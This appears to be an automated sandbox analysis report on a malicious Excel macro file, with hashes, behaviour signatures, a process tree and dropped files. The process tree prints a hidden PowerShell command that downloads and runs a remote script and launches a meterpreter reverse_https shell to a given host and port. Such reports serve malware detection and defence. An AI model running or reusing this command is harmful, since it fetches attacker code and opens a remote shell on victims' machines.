Overview

overview

10

Static

static

8

ec26f724c9...22.xls

windows7-x64

10

ec26f724c9...22.xls

windows10-2004-x64

10

Analysis

  • max time kernel
    25s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    06-07-2024 22:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ec26f724c96ed1e774bff0f7b9190ce5cd583d6e733ecdc27ce58bfd98ddff22.xls

  • Size

    44KB

  • MD5

    131ef16f091ff53b2a1105b1888ede58

  • SHA1

    7a6e33c6db43066d29724fcaaa520af9d5153276

  • SHA256

    ec26f724c96ed1e774bff0f7b9190ce5cd583d6e733ecdc27ce58bfd98ddff22

  • SHA512

    072528801c2be63b28b13156ba596336f67f5592da6e770ab709f5140a986772f4bf64eece7d9141d5e8898f1d80d148c2cbc0cfac913445d0c4d6416fdb3e07

  • SSDEEP

    768:JtvoD8sGk3hbdlylKsgqopeJBWhZFGkE+cL4LxlnAZhgWeuFlmQQcQbJ9acY9ac6:oOk3hbdlylKsgqopeJBWhZFGkE+cL4LN

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ec26f724c96ed1e774bff0f7b9190ce5cd583d6e733ecdc27ce58bfd98ddff22.xls
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2076
    • C:\Windows\SysWOW64\wscript.exe
      wscript C:\Users\Public\config.vbs
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2652
      • C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2744
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2888

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GEKIPOBC2BPJAHR64G4B.temp
    Filesize

    7KB

    MD5

    c2456a30ba943903ad8a71f9dec7670e

    SHA1

    11641b4e0bc3c555445e2156623780fc463593f3

    SHA256

    de2c2300cfaf360ac2d30c62dd8380bd406285af2434a1272c0171b8add5b67b

    SHA512

    a645f7e614e94cd72b7b3655edb7c105eec5c1358d4c389d8901ad7c3a32ec81594c78b3a874d579f15e91305567e9b3aca0f845be0d6f33c74505d1948f44f9

    Download Submit

  • C:\Users\Public\config.vbs
    Filesize

    461B

    MD5

    ce52ab154163c511f0efa6a61e22ab64

    SHA1

    9f12cc215e15802eddcb02cb5370ef16b21fa3a6

    SHA256

    df342167afd4f1758c02b8793b27a2f9e35f074ea20aa1aa75c69d48d88fcd17

    SHA512

    cf50d9b51fcb4f3150aeca158a7a2249b1f5806d0e9ffc2b479ef936a7d85fdaaf302ce5cb3263e03b3c7805d38ca734f167ff757e6b6cdf89343f13a2bf0f78

    Download Submit

  • memory/2076-3-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2076-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2076-24-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2076-4-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2076-28-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2076-7-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2076-8-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2076-33-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2076-18-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2076-12-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2076-11-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2076-19-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2076-5-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2076-6-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2076-13-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2076-38-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2076-2-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2076-52-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2076-51-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2076-1-0x000000007242D000-0x0000000072438000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2076-48-0x000000007242D000-0x0000000072438000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2076-49-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2076-50-0x00000000003D0000-0x00000000004D0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/2888-45-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2888-44-0x000000001B590000-0x000000001B872000-memory.dmp

    Filesize

    2.9MB

    Download